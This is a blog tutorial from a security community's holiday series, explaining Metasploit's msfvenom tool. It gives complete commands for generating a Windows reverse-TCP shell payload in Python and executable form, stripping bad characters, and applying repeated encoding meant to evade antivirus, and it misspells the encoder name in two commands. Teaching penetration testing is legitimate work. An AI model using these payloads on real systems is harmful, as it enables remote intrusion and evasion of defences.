• Div0 Blog Editor

9th Day of Christmas: msfvenom

On the 9th Day of Christmas, Div0 gave to me ... msfvenom, searchsploit, urlcrazy, recon-ng, Zone Transfer Tool, Using Online Digest Databases, Hash Identification, Password Mutation Using JTR, and Custom Word List Generator (CeWL).

msfvenom is the successor of msfpayload and msfencode. Both msfpayload and msfencode are slated for retirement in the near future (Jun 2015). msfvenom consolidates the features of its predecessor and standardise its usage.

msfvenom is able to:

  1. Generate shellcodes (i.e. msfpayload); and

  2. Encode shellcodes into formats that can be easily deployed onto targets (i.e. msfencode).

msfvenom --help
msfvenom -l payloads
msfvenom -l encoders

To show available output formats:

msfvenom --help-formats

Executable Formats: asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

Transform Formats: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

msfvenom In Action: Generate windows/shell/reverse_tcp Payload

msfvenom -p windows/shell/reverse_tcp -o

For this demo, I will set LHOST as 192.168.1.100 and LPORT as 5555, and output the payload in Python format.

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -f python

Many times, there may be some bad characters in the payload that could cause the exploit to fail. One such example is the \x00 (null bytes). To remove them, we can use the -b options.

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -f python

We can also output the payload in executable format:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -f exe > shell-exe

1 round of shikata_ga_nai encoding is automatically applied. shikata_ga_nai is a polymorphic XOR additive feedback encoder. We can perform extra encoding to evade antivirus detection. To encode the payload with shitaka_ga_nai 10 times:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -e "x86/shitaka_ga_nai" -i 10 -f exe > shell-exe

VirusTotal scan result on the executable with 1 round of encoding:

VirusTotal scan result on the executable with 10 rounds of encoding:

Notice both payloads yield almost the same detection rate? This is because most antivirus knows the templates used by Metasploit.

Shared by Tan Jun Hao.

 
  • Facebook
  • Twitter
  • YouTube

Contact Us

Terms of Use | Code of Conduct

All rights reserved.

Division Zero (Div0) © 2017-2020.

Edgis © 2011-2017.